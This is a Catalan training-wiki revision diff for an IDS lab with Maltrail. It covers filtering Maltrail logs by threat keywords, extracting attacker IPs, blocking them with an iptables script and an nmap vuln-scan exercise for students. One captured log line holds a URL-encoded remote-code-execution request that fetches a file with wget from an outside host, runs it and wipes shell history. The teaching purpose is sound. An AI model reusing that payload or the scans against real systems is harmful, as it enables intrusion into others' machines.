bytes.cat

La wiki d'FP d'informàtica

Eines de l'usuari

Eines del lloc

Camí:
ids-maltrail

Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

Ambdós costats versió prèvia Revisió prèvia
Següent revisió 		Revisió prèvia
ids-maltrail [2022/07/15 13:29]
lino_de_la_munoza_munoz 		ids-maltrail [2022/07/15 13:53] (actual)
lino_de_la_munoza_munoz
Línia 1: Línia 1:
 ====== pràctica-ids-maltrail ====== ====== pràctica-ids-maltrail ======
 +
 +{{tag> ids  #FpInfor #Ciber #CiberMp03 #Ceti #CetiMp03}}
  
 Utilització de l’ids maltrail com a detector d’intrussions i afegirem opcions de bloqueig a les deteccions a traves d’un script que recull del log de l’ids. Utilització de l’ids maltrail com a detector d’intrussions i afegirem opcions de bloqueig a les deteccions a traves d’un script que recull del log de l’ids.
Línia 93: Línia 95:
  
  
 +Si ara filtrem per valors a la columna info per trobar el potential code execution presentat anteriorment amb la ip  45.61.185.76
 +
 +<file bash comanda-logs>
 +rootl:/var/log/maltrail# cat /var/log/maltrail/2022-07-10.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code)'|grep 45.61.185.76
 +"2022-07-10 04:13:11.375192" l 45.61.185.76 42122 172.16.1.1 80 TCP URL 80.59.197.13(/shell?cd%20%2ftmp%3bwget%20http%3a%2f%2f103.147.122.68%2f.3%20-o%20fnu%3bchmod%20777%20fnu%3bsh%20fnu%3brm%20-rf%20fnu%3bhistory%20-w%3bhistory%20-c) "potential remote code execution (suspicious)" (heuristic)
 +"2022-07-10 04:13:11.375257" l 45.61.185.76 42122 192.168.1.175 80 TCP URL 80.59.197.13(/shell?cd%20%2ftmp%3bwget%20http%3a%2f%2f103.147.122.68%2f.3%20-o%20fnu%3bchmod%20777%20fnu%3bsh%20fnu%3brm%20-rf%20fnu%3bhistory%20-w%3bhistory%20-c) "potential remote code execution (suspicious)" (heuristic)
 +
 +……
 +
 +</file>
 +
 +
 +la columna 4 que és la que conté la ip agressora
 +
 +
 +cat /var/log/maltrail/2022-07-10.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code)'|awk '{print $4}'
 +
 +o
 +
 +root@l:/var/log/maltrail# cat /var/log/maltrail/2022-07-10.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code)'|cut -d ' ' -f 4
 +
 +Finalment, aquestes son les ip detectades avui
 +
 +<file bash comanda-filtre>
 +root@l:/var/log/maltrail# cat /var/log/maltrail/2022-07-10.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code)'|awk '{print $4}' | sort| uniq -c| awk '{print $2}'
 +103.251.167.21
 +104.248.244.119
 +107.181.185.226
 +114.249.223.57
 +114.35.102.141
 +1.235.128.206
 +128.199.43.218
 +129.146.241.147
 +134.122.66.121
 +134.209.198.12
 +138.68.91.192
 +139.255.4.205
 +139.59.87.181
 +141.98.10.157
 +141.98.10.74
 +141.98.11.29
 +144.172.73.66
 +159.89.115.75
 +162.247.72.199
 +165.227.124.168
 +167.172.207.63
 +167.172.50.255
 +179.60.147.74
 +181.49.53.26
 +182.75.139.26
 +185.146.232.168
 +185.196.220.70
 +185.220.100.240
 +185.220.100.241
 +185.220.100.244
 +185.220.100.255
 +185.220.101.47
 +185.220.102.7
 +
 +
 +</file>
 +
 +
 +
 +Realitzem la redirecció a un fitxer.data per tenir les ip’s
 +<file bash comanda-ips-exportades>
 +fecha=$(date +%F)
 +echo $fecha
 +A=ip-ids.$fecha
 +echo $A
 +cat /var/log/maltrail/2022-07-10.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code)'|awk '{print $4}' | sort| uniq -c| awk '{print $2}' > $A
 +
 +</file>
 +
 +Finalment podem intergrar-ho amb iptables per tal d’afegir-les directament a partir del fitxer generat. 
 +
 +<file bash comanda-ips-ids-iptables>
 +fecha=$(date +%F)
 +echo $fecha
 +A=ip-ids.$fecha
 +echo $A
 +#cat /var/log/maltrail/2022-07-13.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code|directory|shells|proxy|sql|config)' | awk '{print $4}' | sort| uniq -c| awk '{print $2}' > $A
 +#no poso sql pq de vegades son alumnes als serveis interns.
 +cat /var/log/maltrail/$(date +"%Y-%m-%d").log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code|directory|shells|proxy|config|php injection)' | awk '{print $4}' | sort| uniq -c| awk '{print $2}' > $A
 +
 +
 +for ip in $(cat $A); do
 +    echo $ip
 +    #comprovem si la ip està ja dintre del tallafocs, grep -w nomes per aquesta paraula, si no està l'afegim en diferents taules.
 +    GG=$(/sbin/iptables -nvL INPUT |grep -w $ip | uniq -c | awk '{print $9}' )
 +    if [ ! $GG ] ; then
 +        /sbin/iptables -t mangle -A PREROUTING -s $ip -j DROP
 +        /sbin/iptables -A INPUT -s $ip -j DROP
 +        /sbin/iptables -A FORWARD -s $ip -j DROP
 +        /sbin/iptables -A OUTPUT -d $ip -j DROP
 +
 +
 +        echo 'ESCRIBO NUEVA IP BLOQUEIG'
 +    fi
 +    #echo 'ja estava' $ip
 +done;
 +echo 'FINALItZAt Afegir les noves ip-ids'
 +
 +</file>
 +
 +
 +\\
 +
 +===== EXERCICI =====
 +<WRAP todo>
 +  - Afegir a crontab l'execució repetida del teu script
 +  - L'alumne provocarà nvoes entrades a l'ids a traves per exemple de nmap, opció cercar vulnerabilitats, per tal de comprovar el seu funcionament i ajustar la periocitat al cron
 +  - nmap x.x.x.x -A -T4 -sV --script vuln -p 80,443,1521   
 +  - {{:maltrail6.jpg?400|}} 
 +  - {{:maltrail7.jpg?400|}} 
 + </WRAP>
  
 +\\
  
  
ids-maltrail.1657891777.txt.gz · Darrera modificació: 2022/07/15 13:29 per lino_de_la_munoza_munoz

Eines de la pàgina

Excepte on es digui una altra cosa, el contingut d'aquest wiki està subjecte a la llicència següent: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki